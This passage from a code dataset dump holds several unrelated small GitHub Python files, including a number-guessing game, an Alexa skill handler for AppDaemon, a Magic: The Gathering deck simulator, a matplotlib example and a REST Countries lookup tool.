interactivo\")\n","repo_name":"ulric09/mi-primer-programa","sub_path":"Convertidor de Celsius a Farenheit.py","file_name":"Convertidor de Celsius a Farenheit.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72864695526","text":"#!/usr/bin/env python3\n\nprint(\"Please think of a number between 0 and 100!\")\n\nmin = 0\nmax = 100\n\nwhile True:\n guess = (min + max) // 2\n print(\"Is your secret number\", str(guess) + \"?\")\n\n ans = input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly. \")\n if ans != \"h\" and ans != \"l\" and ans !=\"c\":\n print(\"Sorry, I did not understand your input.\")\n continue\n\n if ans == \"c\":\n print(\"Game over. 
Your secret number was:\", guess)\n break\n\n elif ans == \"h\":\n max = guess\n\n else:\n min = guess\n","repo_name":"rosaelton/OSSU-02.2-MITx-6.00.1x-Intro-To-CS-using-Python","sub_path":"unit-02/guess-my-number.py","file_name":"guess-my-number.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69855704164","text":"#!/usr/bin/env python3\n\nimport os\nfrom setuptools import setup\n\nbase_dir = os.path.dirname(__file__)\nwith open(os.path.join(base_dir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='norman',\n version='0.1.0',\n description='AMR Normalization',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/goodmami/norman',\n author='Michael Wayne Goodman',\n author_email='goodman.m.w@gmail.com',\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Scientific/Engineering :: Information Analysis',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Text Processing :: Linguistic',\n 'Topic :: Utilities'\n ],\n keywords='nlp amr semantics graphs',\n py_modules=['norman'],\n setup_requires=['wheel >= 0.31.0'],\n install_requires=[\n 'penman == 0.6.2',\n 'smatch == 1.0.1'\n ]\n)\n","repo_name":"goodmami/norman","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23987210104","text":"from colorama import init, Fore, Style\ninit()\n\nnome_file = \"COM26_bin.txt\" # sostituisci con il binario del file\n\nwith open(\"COM26_analysis.txt\", \"w\") as output:\n with open(nome_file, \"r\") as file:\n blocchi = []\n blocco = \"\"\n while True:\n temp = file.read(1)\n if not temp: break\n blocco += temp\n if blocco.endswith(\"S\"):\n blocchi.append(blocco.replace(\"S\",\"\"))\n blocco = \"\"\n\n for blocco in blocchi:\n # prendo la riga in binario\n data_BIN = blocco.strip() # Rimuove spazi e caratteri di nuova linea\n # ogni 8 caratteri metto uno spazio\n riga_BIN = []\n riga_BYTE = []\n\n for i in range(0, len(data_BIN), 8):\n byte_BIN = data_BIN[i:i+8] \n riga_BIN.append(byte_BIN)\n riga_BYTE.append(''.join(format(b, '02x') for b in (int(byte_BIN, 2).to_bytes(1, \"big\"))))\n \n bns = \"\"\n bys = \"\"\n bts = \"\"\n stampa = []\n k = 0\n for i in range(len(riga_BIN)):\n bns += riga_BIN[i] + \" \"\n bys += riga_BYTE[i] + \" \"\n try: \n if riga_BYTE[i] == \"0a\" or riga_BYTE[i] == \"0d\":\n bts += repr(bytes.fromhex(riga_BYTE[i]).decode(\"ascii\")) + \" \"\n else: bts += bytes.fromhex(riga_BYTE[i]).decode(\"ascii\") + \" \"\n except UnicodeDecodeError as e:\n bts += \"- \"\n k += 1\n if (k == 8):\n stampa.append(bns + \"\\t\" + bys + \"\\t\" + bts)\n bns = \"\"\n bys = \"\"\n bts = \"\"\n k = 0\n \n for j in range(len(stampa)):\n print(stampa[j], file=output)\n\n print(\"\\nFINE BLOCCO\\n \", 
file=output)\n","repo_name":"lucapada/GPSDataLoggerParser","sub_path":"analyzeStream.py","file_name":"analyzeStream.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73615490084","text":"from typing import Optional, Dict, List\nimport appdaemon.plugins.hass.hassapi as hassapi\nimport helpers\n\n\nclass AlexaAPI(hassapi.Hass):\n \"\"\"AlexaAPI\"\"\"\n def initialize(self):\n \"\"\"App init\"\"\"\n self.register_endpoint(self.api_call, 'alexa')\n self.sessions: Dict[str, Dict] = {}\n\n def api_call(self, data, kwargs):\n \"\"\"Entrypoint of REST call\"\"\"\n self.log('New Alexa API request')\n session_id = data.get('session', {}).get('sessionId', None)\n # Note that the session object is missing in AudioPlayer,\n # VideoApp, or PlaybackController requests\n if not session_id:\n self.log('Request is missing session.sessionId!')\n return {}, 400\n\n # Record the request\n request_data = self.get_request_data_from_json(data)\n if session_id not in self.sessions:\n self.log('New session: %s' % session_id)\n self.sessions[session_id] = {'requests': list()}\n self.sessions[session_id]['requests'].append(request_data)\n\n # Handle request\n return self.handle_request(session_id)\n\n def get_request_data_from_json(self, data):\n \"\"\"Extract the info we need from the data dict. Returns new dict with\n our desired fields\n\n \"\"\"\n # Any error?\n error = data.get('request', {}).get('error', {}).get('message', '')\n\n # Get a proper device name\n device_id = data.get('context',\n {}).get('System',\n {}).get('device',\n {}).get('deviceId',\n '')\n device = self.args.get('devices', {}).get(device_id, 'unknown device')\n # Log the device if not yet known\n if device_id not in self.args.get('devices', {}):\n self.log('Request from device: %s' % device_id)\n\n # The slots for this intent\n slots = {}\n for slot_value in data.get('request', {}).get('intent',\n {}).get('slots',\n {}).values():\n slots[slot_value.get('name')] = {\n 'value': slot_value.get('value'),\n 'resolutions': []\n }\n # Add the 'resolutions' flattened. Let's hope thats enough\n for resolution in slot_value.get('resolutions',\n {}).get('resolutionsPerAuthority',\n []):\n if resolution.get('status', {}).get('code',\n '') != 'ER_SUCCESS_MATCH':\n continue\n for rpa_value in resolution.get('values', []):\n slots[slot_value.get('name')]['resolutions'].append({\n 'id':\n rpa_value.get('value', {}).get('id', ''),\n 'name':\n rpa_value.get('value', {}).get('name', '')\n })\n\n # The intent name. 
Note some amazon intents are named like AMAZON.Intent\n intent = data.get('request', {}).get('intent', {}).get('name', '')\n confirmation_status = data.get('request',\n {}).get('intent',\n {}).get('confirmationStatus',\n 'NONE')\n return {\n 'type': data.get('request', {}).get('type', ''),\n 'intent': intent,\n 'confirmation_status': confirmation_status,\n 'dialog_state': data.get('request', {}).get('dialogState', ''),\n 'device': device,\n 'slots': slots,\n 'error': error\n }\n\n # pylint: disable=too-many-return-statements,too-many-branches\n def handle_request(self, session_id):\n \"\"\"Handle latest request for `session_id`\"\"\"\n # Get the latest request in the session\n request = self.sessions[session_id]['requests'][-1]\n\n # There are 4 different standard request types we handle\n if request['type'] == 'LaunchRequest':\n self.log('LaunchRequest')\n # Sent when the user invokes your skill without providing\n # a specific intent.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#launchrequest\n return self.get_app_response(self.args.get('launchRequestApp', ''),\n 'launchRequest', session_id)\n\n if request['type'] == 'IntentRequest':\n self.log('IntentRequest: %s' % request['intent'])\n # Sent when the user makes a request that corresponds to\n # one of the intents defined in your intent schema.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#intentrequest\n if not request['dialog_state']:\n self.log(\n 'Dialog not yet started (or intent has no dialog model, i.e. no multi-turn dialog)'\n )\n # TODO: Not sure how this works. Do we delegate this\n # request to a method in the intent app?\n return self.create_response_dict(shouldEndSession=True), 200\n if request['dialog_state'] == 'STARTED':\n self.log('Dialog started')\n # Dialog started, let's give the app a chance to respond, or we delegate back to Alexa\n try:\n return self.get_app_response(request['intent'],\n 'intentStarted',\n session_id,\n error_exception=True)\n except Exception: # pylint: disable=broad-except\n self.log(\n 'Failed to ask %s for %s. Delegating dialog to Alexa' %\n (request['intent'], 'intentStarted'))\n return self.create_response_dict(\n directives=[{\n 'type': 'Dialog.Delegate',\n 'updatedIntent': None\n }]), 200\n if request['dialog_state'] == 'IN_PROGRESS':\n self.log('Dialog in progress')\n # Dialog started, let's give the app a chance to respond, or we delegate back to Alexa\n try:\n return self.get_app_response(request['intent'],\n 'intentInProgress',\n session_id,\n error_exception=True)\n except Exception: # pylint: disable=broad-except\n self.log(\n 'Failed to ask %s for %s: Delegating dialog to Alexa' %\n (request['intent'], 'intentInProgress'))\n return self.create_response_dict(\n directives=[{\n 'type': 'Dialog.Delegate',\n 'updatedIntent': None\n }]), 200\n if request['dialog_state'] == 'COMPLETED':\n self.log('Dialog completed')\n # COMPLETED can either be because the dialog is really\n # completed in which case we dispatch to the app, or\n # there are dialog confirmation rules in which case\n # dialogState is COMPLETED regardless of whether the\n # user confirmed or denied the entire intent. So we\n # check that the user did not deny the confirmation\n if request['confirmation_status'] == 'DENIED':\n self.log('User denied the intent. 
Aborting session')\n self.clean_session(session_id)\n return self.create_response_dict(\n shouldEndSession=True), 200\n self.log('Calling user intent app %s' % request['intent'])\n return self.get_app_response(request['intent'],\n 'intentCompleted', session_id)\n\n self.log('Dialog state is %s - this should not happen!' %\n request['dialog_state'])\n return self.create_response_dict(), 200\n\n if request['type'] == 'SessionEndedRequest':\n self.log('SessionEndedRequest')\n # Sent when the current skill session ends for any reason\n # other than your code closing the session.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#sessionendedrequest\n self.log('Alexa says session %s has ended: %s' %\n (session_id, request['error']))\n self.clean_session(session_id)\n return self.create_response_dict(), 200\n\n if request['type'] == 'CanFulfillIntentRequest':\n self.log('CanFulfillIntentRequest')\n # Sent when the Alexa service is querying a skill to\n # determine whether the skill can understand and fulfill\n # the intent request with detected slots, before actually\n # asking the skill to take action.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#CanFulfillIntentRequest\n try:\n return self.get_app_response(request['intent'],\n 'canFulfill',\n session_id,\n error_exception=True)\n except Exception: # pylint: disable=broad-except\n self.log(\n 'Failed to ask %s for %s: Delegating dialog to Alexa' %\n (request['intent'], 'canFulfill'))\n return self.create_response_dict(), 200\n\n # TODO: Non-standard request type or other interface request\n # need to be implemented\n self.log('Non-standard request we cannot handle yet')\n self.clean_session(session_id)\n return self.plain_error(request)\n\n # pylint: disable=too-many-arguments,no-self-use,invalid-name\n def create_response_dict(self,\n outputSpeech: Optional[Dict] = None,\n card: Optional[Dict] = None,\n reprompt: Optional[Dict] = None,\n directives: Optional[List] = None,\n shouldEndSession: bool = False):\n \"\"\"Returns a skeleton of the response structure\"\"\"\n response = {\n 'version': '1.0',\n 'sessionAttributes': {},\n 'response': {\n 'outputSpeech': outputSpeech or {},\n 'card': card or {},\n 'reprompt': reprompt or {},\n 'directives': directives or [],\n 'shouldEndSession': shouldEndSession\n }\n }\n # Clean empty properties from the object (would trigger error with Alexa)\n for prop in ['outputSpeech', 'card', 'reprompt', 'directives']:\n if not response['response'][prop]:\n del response['response'][prop]\n return response\n\n def get_simple_outputSpeech(self, text, request):\n \"\"\"Returns an outputSpeech structure for the response filled with a\n simple text\n\n \"\"\"\n return {\n 'type': 'SSML',\n 'ssml': '<speak>' + self.prepare_speech(text, request) + '</speak>'\n }\n\n # pylint: disable=no-self-use\n def prepare_speech(self, text, request):\n \"\"\"Prepares speech text by cleaning up and replacing slots\"\"\"\n if not text:\n return text\n for slotname, slotvalue in request['slots'].items():\n text = text.replace(\"{{\" + slotname + \"}}\",\n slotvalue.get('value', '') or '')\n return text.replace(\"{{device}}\",\n request['device']).replace(\"_\", \" \").replace(\n \"...\", \"\")\n\n def get_app_response(self,\n app_name,\n method,\n session_id,\n error_exception=False):\n \"\"\"Asks an app `app_name` for a response by calling `method(request)`\n to it. 
`error_exception` raises an exception instead of returning an\n Alexa compatible error response\n\n \"\"\"\n request = self.sessions[session_id]['requests'][-1]\n app = self.get_app(app_name)\n if not app:\n # If the app was not found, we implement a better response\n # for some default/common intent requests. This allows for\n # better expected behaviour while the user can still\n # override by creating an intent app for it\n if app_name in ['AMAZON.StopIntent', 'AMAZON.CancelIntent']:\n self.clean_session(session_id)\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n helpers.random_pick(\n self.args.get('conversationEnd', 'Bye')), request),\n shouldEndSession=True), 200\n if app_name in ['yesIntent', 'AMAZON.YesIntent']:\n # If configured and not overridden, we assume user\n # responded 'yes' to a question 'conversationQuestion'\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n helpers.random_pick(\n self.args.get('conversationQuestion',\n 'What can I do?')), request),\n shouldEndSession=False), 200\n self.log('App not found: %s' % app_name)\n if error_exception:\n raise Exception('App not found: %s' % app_name)\n return self.plain_error(request)\n\n if not (hasattr(app, method) and callable(getattr(app, method))):\n self.log(\n 'Requested property %s of app %s is not callable or does not exist!'\n % (method, app_name))\n if error_exception:\n raise Exception(\n 'Requested property %s of app %s is not callable or does not exist!'\n % (method, app_name))\n return self.plain_error(request)\n\n try:\n app_response = getattr(app, method)(request)\n except Exception as err: # pylint: disable=broad-except\n self.log('ERROR: Exception calling intent app %s: %s' %\n (app_name, str(err)))\n if error_exception:\n raise err\n return self.plain_error(request)\n\n # For the app response we accept 5 variants, depending on\n # whether or not the app needs a custom response:\n #\n # 1. A plain string:\n # We treat it as the text to speak\n #\n # 2. A dictionary:\n # The keys should correspond to the entries in the\n # 'response' property of the response dictionary. Values of\n # the keys will be copied over to the response dict (the\n # dict in `AlexaAPI.create_response_dict`)\n #\n # 3. A tuple of (Dict, int)\n # In this case the dict is treated as a complete response\n # and the int as the return code. No modification occurs,\n # dict is returned to Amazon **as is**. So make sure you\n # return a valid structure in your app\n #\n # 4. A tuple of (str, Dict)\n # str is treated as the text to speak and the Dict provides\n # possible overrides to the keys in the 'response' property\n # of the response json\n #\n # 5. A tuple of (str, str)\n # The first str is treated as the text to speak and the second one\n # can be any of ['stop', 'next']. In case of 'stop' a\n # random intentEnd phrase is appended to the text and the\n # intent ends. For 'next' a random nextConversationQuestion\n # is appended and the dialog continues. 
If the second str\n # is not given or not one of the given options, it\n # is effectively the same as 1 (the text is spoken)\n\n if isinstance(app_response, tuple):\n if len(app_response) == 2:\n value1, value2 = app_response\n if isinstance(value1, dict) and isinstance(value2, int):\n # Variant 3\n return value1, value2\n if isinstance(value1, str) and isinstance(value2, dict):\n # Variant 4\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n value1, request),\n card=value2.get('card', {}),\n reprompt=value2.get('reprompt', {}),\n directives=value2.get('directives', []),\n shouldEndSession=value2.get('shouldEndSession',\n False)), 200\n if isinstance(value1, str) and isinstance(value2, str):\n # Variant 5\n if value2 == 'stop':\n message = helpers.random_pick(\n self.args.get('conversationEnd', 'Bye'))\n if value1:\n message = value1 + '. ' + message\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n message, request),\n shouldEndSession=True), 200\n if value2 == 'next':\n message = helpers.random_pick(\n self.args.get('nextConversationQuestion',\n 'What else can I do?'))\n if value1:\n message = value1 + '. ' + message\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n message, request),\n shouldEndSession=False), 200\n\n # Fallback to variant 1\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n value1, request)), 200\n\n self.log('App %s returned tuple of unknown type combination' %\n app_name)\n if error_exception:\n raise Exception(\n 'App %s returned tuple of unknown type combination' %\n app_name)\n return self.plain_error(request)\n\n self.log('App %s returned too many values in tuple' % app_name)\n if error_exception:\n raise Exception('App %s returned too many values in tuple' %\n app_name)\n return self.plain_error(request)\n\n if isinstance(app_response, str):\n # Variant 1\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n app_response, request)), 200\n\n if isinstance(app_response, dict):\n # Variant 2\n return self.create_response_dict(\n outputSpeech=app_response.get('outputSpeech', {}),\n card=app_response.get('card', {}),\n reprompt=app_response.get('reprompt', {}),\n directives=app_response.get('directives', []),\n shouldEndSession=app_response.get('shouldEndSession',\n False)), 200\n\n # If we get here, we have unknown return value(s) from the app\n self.log('App %s returned unknown value(s)' % app_name)\n if error_exception:\n raise Exception('App %s returned unknown value(s)' % app_name)\n return self.plain_error(request)\n\n def plain_error(self, request, message=None):\n \"\"\"Shorthand for returning a plain error message\"\"\"\n error_msg = message or helpers.random_pick(\n self.args.get(\"responseError\", ['Error']))\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(error_msg, request),\n shouldEndSession=True), 200\n\n def clean_session(self, session_id):\n \"\"\"Removes a session from the internal state\"\"\"\n if session_id in self.sessions:\n self.log('Cleaning up session %s' % session_id)\n del self.sessions[session_id]\n return True\n return False\n","repo_name":"foorensic/appdaemon-alexa","sub_path":"alexa.py","file_name":"alexa.py","file_ext":"py","file_size_in_byte":21151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42673784777","text":"from flask import render_template, request, Response\nimport 
requests\nfrom application import app\nimport json\n\n@app.route('/return/data', methods=['GET','POST'])\ndef returnData():\n data_sent = request.get_json()\n\n if data_sent['speed'] == 'Fast':\n result = 'Slow to appropriate speed'\n elif (data_sent['speed'] == 'Slow' and data_sent['weather'] != 'Sun') or (data_sent['speed'] == 'Average' and data_sent['weather'] == 'Rain'):\n result = 'Proceed with caution'\n elif data_sent['speed'] == 'Average' and (data_sent['weather'] == 'Snow' or data_sent['weather'] == 'Frost'):\n result = 'Slow down'\n elif data_sent['speed'] == 'Average' and data_sent['weather'] == 'Sun':\n result = 'Continue'\n else:\n result = 'Drive with care at appropriate speed'\n return Response(result, mimetype='text/plain') ","repo_name":"Sboncio/QA-SFIA-2","sub_path":"service4/application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38894256768","text":"#!/usr/bin/env python3 v1.3\n# -*- coding: utf-8 -*-\n\"\"\"\nClasses for the Tron deck, and cards within the deck.\n\nversion 2.0: updated for Once Upon a Time\n\"\"\"\n\nimport random\n\n# helper funtion to get names of cards in bfield\ndef tron_check(bfield):\n \n bfield_names = {}\n for card in bfield:\n bfield_names[card.name] = bfield_names.get(card.name, 0) + 1\n \n tron_set = set(['Urza\\'s Tower', 'Urza\\'s Mine', 'Urza\\'s Power Plant'])\n return tron_set.difference(bfield_names)\n\n# generic Magic Card class\nclass MagicCard:\n \n def __init__(self, name, cmc, card_type, colorless, gmc):\n self.name = name\n self.cmc = cmc\n self.card_type = card_type\n self.colorless = colorless # boolean\n self.gmc = gmc # green mana cost\n \n# class to specify Land cards\nclass Land(MagicCard):\n \n def __init__(self, name, basic):\n self.name = name\n self.basic = basic\n MagicCard.__init__(self, name, 0, 'land', True, 0)\n \n def play(self, hand, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n# class to simulate casting Ancient Stirrings\nclass AncientStirrings(MagicCard):\n \n def __init__(self):\n MagicCard.__init__(self, 'Ancient Stirrings', 1, 'sorcery', False, 1)\n\n def cast(self, hand, deck, bfield):\n\n # determine which lands are still needed for Tron\n tron_needed = tron_check(bfield)\n \n # look at the top five cards of the deck\n temp = deck.deck[:5]\n \n # selects a Tron land to add to hand, if available\n for card in temp:\n if card.name in tron_needed and card not in hand:\n hand.append(card)\n temp.pop(temp.index(card))\n break\n\n # selecting another card if no new Tron lands in top 5 cards\n temp_names = {card.name:temp.index(card) for card in temp}\n\n # coded to prioritize achieving Tron over all else\n priority = ('Expedition Map', 'Chromatic Star', 'Chromatic Sphere', \n 'Forest', 'Urza\\'s Tower', 'Urza\\'s Mine', \n 'Urza\\'s Power Plant','Sanctum of Ugin', 'Ghost Quarter')\n \n if len(temp) == 5:\n for name in priority:\n if name in temp_names:\n hand.append(temp[temp_names[name]])\n temp.pop(temp_names[name])\n break\n \n # remove the top five cards of the deck\n del deck.deck[:5]\n \n # put the remaining 4 cards on the bottom of the deck\n deck.deck.extend(temp)\n \n hand.pop(hand.index(self))\n\n\n# class to simulate casting Once Upon a Time\nclass OUaT(MagicCard):\n \n def __init__(self):\n MagicCard.__init__(self, 'Once Upon a Time', 2, 'instant', False, 1)\n \n def cast(self, hand, deck, bfield):\n \n # determine which lands are still 
needed for Tron\n tron_needed = tron_check(bfield)\n \n # look at the top five cards of the deck\n temp = deck.deck[:5]\n \n # selects a Tron land to add to hand, if available\n for card in temp:\n if card.name in tron_needed and card not in hand:\n hand.append(card)\n temp.pop(temp.index(card))\n break\n\n # selecting another card if no new Tron lands in top 5 cards\n temp_names = {card.name:temp.index(card) for card in temp}\n\n # coded to prioritize achieving Tron over all else\n priority = ('Forest', 'Urza\\'s Tower', 'Urza\\'s Mine', \n 'Urza\\'s Power Plant','Sanctum of Ugin', 'Ghost Quarter')\n \n if len(temp) == 5:\n for name in priority:\n if name in temp_names:\n hand.append(temp[temp_names[name]])\n temp.pop(temp_names[name])\n break\n \n # remove the top five cards of the deck\n del deck.deck[:5]\n \n # put the remaining cards on the bottom of the deck\n deck.deck.extend(temp)\n \n hand.pop(hand.index(self))\n \n \n \n# class to simulate casting and activating Chromatic Star/Sphere\nclass Chromatic(MagicCard):\n \n def __init__(self, name):\n self.name = name\n self.amc = 1 # mana cost of activated ability\n MagicCard.__init__(self, name, 1, 'artifact', True, 0)\n \n def cast(self, hand, deck, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n def ability(self, hand, deck, bfield):\n deck.draw(hand)\n bfield.pop(bfield.index(self))\n \n\n# class to simulate casting and activating Relic of Progenitus\nclass Relic(MagicCard):\n \n def __init__(self):\n self.amc = 1\n MagicCard.__init__(self, 'Relic of Progenitus', 1, 'artifact', True, 0)\n \n def cast(self, hand, deck, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n def ability(self, hand, deck, bfield):\n deck.draw(hand)\n bfield.pop(bfield.index(self))\n\n \n \n# helper function for Sylvan Scrying and Expedition Map\ndef tron_tutor(hand, deck, bfield):\n \n tron_set = set(['Urza\\'s Tower', 'Urza\\'s Mine', 'Urza\\'s Power Plant'])\n bfield_names = [card.name for card in bfield]\n \n # determine which Tron lands are still needed\n tron_needed = list(tron_set.difference(set(bfield_names)))\n hand_names = {card.name:0 for card in hand}\n \n # move a Tron land from deck to hand (only tutors Tron lands)\n for name in tron_needed:\n if name not in hand_names:\n names_deck = {card.name:i for i, card in enumerate(deck.deck)}\n \n # position of the card in the deck\n card_pos = names_deck[name]\n \n # add the selected card to hand\n hand.append(deck.deck[card_pos])\n \n # delete the card from the deck\n deck.deck.pop(card_pos)\n break\n \n deck.shuffle()\n\n\n# class to simulate casting Sylvan Scrying \nclass SylvanScrying(MagicCard):\n \n def __init__(self):\n MagicCard.__init__(self, 'Sylvan Scrying', 2, 'sorcery', False, 1)\n \n def cast(self, hand, deck, bfield):\n tron_tutor(hand, deck, bfield)\n hand.pop(hand.index(self))\n \n \n# class to simulate casting and activating Expedition Map \nclass ExpMap(MagicCard):\n \n def __init__(self):\n self.amc = 2\n MagicCard.__init__(self, 'Expedition Map', 1, 'artifact', False, 0)\n \n def cast(self, hand, deck, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n def ability(self, hand, deck, bfield):\n tron_tutor(hand, deck, bfield)\n bfield.pop(bfield.index(self))\n\n\n# generates a Tron decklist\ndef decklist():\n \n tower = Land('Urza\\'s Tower', False)\n mine = Land('Urza\\'s Mine', False)\n pplant = Land('Urza\\'s Power Plant', False)\n \n sanctum = Land('Sanctum of Ugin', False)\n gq = Land('Ghost Quarter', False)\n forest = Land('Forest', 
True)\n \n # haymakers are treated as generic cards with no function\n karn = MagicCard('Karn Liberated', 7, 'planeswalker', True, 0)\n ugin = MagicCard('Ugin, the Spirit Dragon', 8, 'planeswalker', True, 0)\n ulamog = MagicCard('Ulamog, the Ceaseless Hunger', 10, 'creature', True, 0)\n wurmcoil = MagicCard('Wurmcoil Engine', 6, 'creature', True, 0)\n ballista = MagicCard('Walking Ballista', 0, 'creature', True, 0)\n ostone = MagicCard('Oblivion Stone', 3, 'artifact', True, 0)\n \n emap = ExpMap()\n stirrings = AncientStirrings()\n scrying = SylvanScrying()\n ouat = OUaT()\n star = Chromatic('Chromatic Star')\n sphere = Chromatic('Chromatic Sphere')\n relic = Relic()\n \n tron_lands = [tower, mine, pplant]*4\n \n \n quads = [karn, wurmcoil, ballista, emap, stirrings, scrying, star, ouat]*4\n trips = [sphere, ostone]*3\n dups = [ulamog, ballista, ugin]\n singles = [sanctum, gq]\n forests = [forest]*4\n \n \n return tron_lands + quads + trips + dups + singles + forests\n\n\n# class to simulate the library as a stack\nclass TronDeck:\n \n def __init__(self):\n self.deck = decklist()\n \n def shuffle(self):\n for i in range(0,5):\n random.shuffle(self.deck)\n \n # draw opening hand\n def draw_opener(self, handsize):\n self.shuffle()\n hand = self.deck[:handsize]\n del self.deck[:handsize]\n return hand\n \n def draw(self, hand):\n hand.append(self.deck[0])\n self.deck.pop(0)\n \n def scry_bottom(self):\n self.deck.append(self.deck[0])\n del self.deck[0]\n","repo_name":"jontaklee/MTG-Divination-Tron","sub_path":"card_classes.py","file_name":"card_classes.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7472931583","text":"#!/usr/bin/python \n\nimport numpy as np \nimport matplotlib.pyplot as plt \n\nx = np.linspace(0,10,20) #numpy entre 0 y 10 20 valores espaciado lineal\n\nprint (x)\n\ny = x ** 2.0\nprint(y)\n\ny2 = x ** 1.5\nprint(y2)\n#Tamanyo de la figura\nplt.figure(figsize=(9, 3))\n#dibujar tramas tam linea 2 tamanyo circulo 12\nplt.plot(x,y,\"bo-\",linewidth=2,markersize=12,label=\"Elevado a 2\")\n# anyade los otros val de y en gs- green quadrados\nplt.plot(x,y2,\"gs-\",linewidth=2,markersize=12, label = \"Elevado a 1.5\")\n\n\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.legend(loc = \"upper left\")#leyenda arriba izq\n\nplt.show() #mostrar grafica\n\nplt.savefig(\"figura_ejemplo.png\")\nplt.close()","repo_name":"JosepAnSabate/Python_geologyII","sub_path":"matrius_taules_i_grafics/matplot_graficos.py","file_name":"matplot_graficos.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23525218660","text":"import requests\nimport json\nimport sys\n\nURL = \"https://restcountries.com/v2/all\"\nURL_name = \"https://restcountries.com/v2/name/\"\n\ndef requisicao(url):\n try:\n resposta = requests.get(url)\n if resposta.status_code == 200:\n return resposta.text\n print(\"1\")\n except:\n print(\"erro\", url)\n\ndef parsing(texto_da_resposta):\n try:\n return json.loads(texto_da_resposta)\n except:\n print(\"erro pars\")\n\ndef contagem_de_paises():\n resposta = requisicao(URL)\n if resposta:\n lista_de_paises = parsing(resposta)\n if lista_de_paises:\n return len(lista_de_paises)\n\ndef lista_pais(lista_de_paises):\n for pais in lista_de_paises:\n print(pais[\"name\"])\n\ndef mostrar_populacao(nome_do_pais):\n resposta = requisicao(\"{}/{}\".format(URL_name, nome_do_pais))\n if resposta:\n 
lista_de_paises = parsing(resposta)\n for pais in lista_de_paises:\n print(\"{}:{} habitantes\".format(pais[\"name\"], pais[\"population\"]))\n else:\n print(\"Pais nao encontrado\")\n\ndef mostrar_moedas(nome_do_pais):\n resposta = requisicao(\"{}/{}\".format(URL_name, nome_do_pais))\n if resposta:\n lista_de_paises = parsing(resposta)\n for pais in lista_de_paises:\n print(\"moedas do,\", pais[\"name\"])\n moedas = pais['currencies']\n for moeda in moedas:\n print(\"{} - {}\".format(moeda[\"name\"], moeda[\"code\"]))\n\n else:\n print(\"País nao encontrado\")\n\ndef ler_nome_do_pais():\n try:\n nome_do_pais = sys.argv[2]\n return nome_do_pais\n except:\n print(\"é preciso passar o nome do país.\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n print(' ____ __ __ _ \\n / __ \\___ ___/ /_/ /(_)___ _\\n / /_/ / _ \\/ _ / __/ / / __ `/\\n/ _, _/ __/ __/ /_/ / / /_/ / \\n\\/ |_|\\___/\\___/\\__/_/_/\\__, / \\n /_/ \\n \\n Bem-vindo ao sistema!\\n\\n')\n print(\"uso: python API_Paises \")\n print(\"acoes disponiveis: contagem, moeda, populacao\")\n else:\n argumento1 = sys.argv[1]\n\n if argumento1 == \"contagem\":\n print(contagem_de_paises())\n\n elif argumento1 == \"moeda\":\n pais = ler_nome_do_pais()\n if pais:\n mostrar_moedas(pais)\n\n elif argumento1 == \"populacao\":\n pais = ler_nome_do_pais()\n if pais:\n mostrar_populacao(pais)\n else:\n print(\"argumento invalido\")\n","repo_name":"ragnarcb/API_Paises","sub_path":"API_Paises.py","file_name":"API_Paises.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71588654885","text":"import glob\nimport ntpath\nimport json\nimport ast\n\nfrom openpyxl import load_workbook\nimport pandas as pd\nfrom pandas import ExcelWriter\n\nfrom google import search\nfrom config import *\n\n\ndef get_status():\n try:\n with open(os.path.join(rootpath, 'status', \"status.json\")) as f:\n 